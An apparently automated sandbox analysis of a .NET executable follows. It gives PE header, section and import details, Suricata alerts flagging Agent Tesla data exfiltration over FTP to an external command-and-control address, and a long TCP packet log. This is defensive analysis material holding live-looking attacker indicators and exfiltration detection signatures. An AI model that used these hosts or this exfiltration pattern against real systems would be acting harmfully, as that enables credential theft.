IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x180000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x17bf04	0x17c000	9668d5f04117186ff411d943942830e3	False	0.3221609015213816	data	5.701304787633918	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x17e000	0x5a6	0x600	8f89e4c3cc9f8940df06b9f52d2f5ad1	False	0.4192708333333333	data	4.083006110738813	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x180000	0xc	0x200	426169d3f08bc4ecaeec6945818443be	False	0.041015625	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x17e0a0	0x31c	data			0.4296482412060301
RT_MANIFEST	0x17e3bc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-04T10:41:12.348579+0200	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.7	49700	5.2.84.236	21	TCP
2024-10-04T10:41:12.961239+0200	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.7	49701	5.2.84.236	52560	TCP
2024-10-04T10:41:12.967063+0200	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.7	49701	5.2.84.236	52560	TCP
2024-10-04T10:41:23.412077+0200	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.7	49740	5.2.84.236	21	TCP
2024-10-04T10:41:24.038304+0200	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.7	49760	5.2.84.236	53494	TCP
2024-10-04T10:41:24.043810+0200	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.7	49760	5.2.84.236	53494	TCP
2024-10-04T10:41:33.169028+0200	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.7	49796	5.2.84.236	21	TCP
2024-10-04T10:41:33.785792+0200	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.7	49812	5.2.84.236	51014	TCP
2024-10-04T10:41:34.084545+0200	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.7	49812	5.2.84.236	51014	TCP
2024-10-04T10:41:34.693935+0200	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.7	49812	5.2.84.236	51014	TCP
2024-10-04T10:41:34.829417+0200	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.7	49812	5.2.84.236	51014	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 10:41:05.113142014 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:05.113204956 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:05.113316059 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:05.126712084 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:05.126759052 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:05.672065973 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:05.672329903 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:05.676261902 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:05.676292896 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:05.676709890 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:05.725050926 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:05.900861979 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:05.947402954 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.031507015 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.031544924 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.031554937 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.031620979 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.031657934 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.052556992 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.052634001 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.052643061 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.100078106 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.121248960 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.121268988 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.121293068 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.121321917 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.121366024 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.122750044 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.122761011 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.122816086 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.123668909 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.123678923 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.123919010 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.145234108 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.145243883 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.145359993 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.213507891 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.213520050 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.213587046 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.213640928 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.214174032 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.214230061 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.215001106 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.215059042 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.215856075 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.215910912 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.216738939 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.216814041 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.217623949 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.217686892 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.238007069 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.238090038 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.238341093 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.238403082 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.306437969 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.306560040 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.306929111 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.306987047 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.307697058 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.307753086 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.308037996 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.308084965 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.308593035 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.308645964 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.309079885 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.309175968 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.309429884 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.309488058 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.309860945 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.309930086 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.310360909 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.310415983 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.310646057 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.310694933 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.330611944 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.330856085 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.331042051 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.331094980 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.331106901 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.331160069 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.612581015 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.612601042 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.612701893 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.612703085 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.612739086 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.612761974 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.612782001 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.613044977 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.613090992 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.613464117 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.613521099 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.613559008 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.613619089 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.614552021 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.614614010 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.614620924 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.614633083 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.614675999 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.614692926 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.615520000 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.615577936 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.615600109 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.615607023 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.615628004 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.615657091 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.615663052 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.615686893 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.615701914 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.616542101 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.616599083 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.616607904 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.616657019 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.617322922 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.617379904 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.617750883 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.617803097 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.618019104 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.618072033 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.618325949 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.618376970 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.618732929 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.618777037 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.619002104 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.619049072 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.619425058 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.619477034 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.619643927 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.619699955 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.619796038 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.619849920 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.620345116 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.620390892 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.620574951 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.620618105 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.620970011 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.621026993 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.621318102 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.621371984 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.621681929 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.621731997 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.621925116 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.621975899 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.622260094 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.622308969 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.623131990 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.623187065 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.623491049 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.623541117 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.623544931 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.623555899 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.623595953 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.624001980 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.624052048 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.624397039 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.624454021 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.624586105 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.624638081 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.624887943 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.624946117 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.625168085 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.625221968 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.625554085 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.625612974 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.625976086 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.626025915 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.626213074 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.626274109 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.626554966 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.626607895 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.626739025 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.626790047 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.627046108 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.627098083 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.634979963 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.634994984 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.635051966 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.674732924 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.674791098 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.674813986 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.674932003 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.674945116 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.675035954 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.676820040 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.676891088 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.677009106 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.677067995 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.677197933 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.677257061 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.677479029 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.677546024 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.677762985 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.677824020 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.678143978 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.678205967 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.678453922 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.678514004 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.678540945 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.678600073 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.679127932 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.679195881 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.679209948 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.679264069 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.679266930 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.679281950 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.679313898 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.679341078 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.679811001 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.679872990 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.679959059 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.680016041 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.701339960 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.701446056 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.701742887 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.701817036 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.701961040 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.702019930 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.734312057 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.769551992 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.769614935 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.769635916 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.769658089 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.769685984 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.769701004 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.769910097 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.769963026 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.770185947 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.770241976 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.770469904 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.770518064 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.770833015 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.770880938 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.771102905 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.771152020 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.771426916 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.771471977 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.771473885 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.771485090 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.771538973 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.771538973 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.771893024 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.771945000 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.772023916 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.772084951 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.772109032 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.772114992 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.772141933 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.772835016 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.772882938 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.794078112 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.794198036 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.794312000 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.794364929 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.794641018 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.794686079 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.862346888 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.862417936 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.862468004 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.862538099 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.862569094 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.862574100 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.862624884 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.862626076 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.862643957 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.862688065 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.862833977 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.862901926 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.863094091 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.863166094 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.863424063 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.863493919 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.863893032 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.863965988 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.864021063 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.864109993 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.864453077 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.864526987 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.864602089 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.864669085 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.864717007 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.864784002 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.864955902 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.865017891 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.865031958 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.865083933 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.865106106 CEST	443	49699	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:06.865160942 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:06.893517971 CEST	49699	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:10.073174000 CEST	49700	21	192.168.2.7	5.2.84.236
